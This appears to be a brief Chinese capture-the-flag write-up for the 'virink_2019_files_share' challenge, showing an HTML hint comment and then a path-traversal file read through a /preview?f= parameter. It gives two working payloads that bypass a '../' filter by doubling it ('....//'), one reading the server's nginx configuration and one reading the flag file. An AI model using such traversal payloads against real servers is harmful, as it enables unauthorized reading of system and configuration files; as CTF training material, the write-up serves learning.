virink_2019_files_share

进来就是js小游戏，没有什么提示说还原后才给flag，所以可以直接信息搜集

<head>
	<meta charset="UTF-8">
	<title>The Cube</title>
	<meta name="viewport"
		content="width=device-width,height=device-height,user-scalable=no,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0">
	<link rel="stylesheet" href="/static/style.css">
	<link rel="icon" href="/uploads/favicon.ico" type="image/x-icon" />
	<!-- Hint : flag in f1ag_Is_h3re -->
	<!-- 趣味题，真的是为了出题而出题的，别打我。 By Virink -->
</head>

发现提示进去看看。

任意文件读取（双写绕过过滤）：由于是使用OpenResty，尝试包含nginx的配置文件，默认是/etc/nginx/conf.d/default.conf
尝试访问后发现过滤了../,所以使用双写绕过

1	/preview?f=....//....//....//....//....//....//....//etc..//nginx..//conf.d..//default.conf

然后根据提示访问flag文件

1	/preview?f=....//....//....//....//....//....//....//f1ag_Is_h3re..//flag

参考链接：

https://blog.csdn.net/qq_46263951/article/details/119599368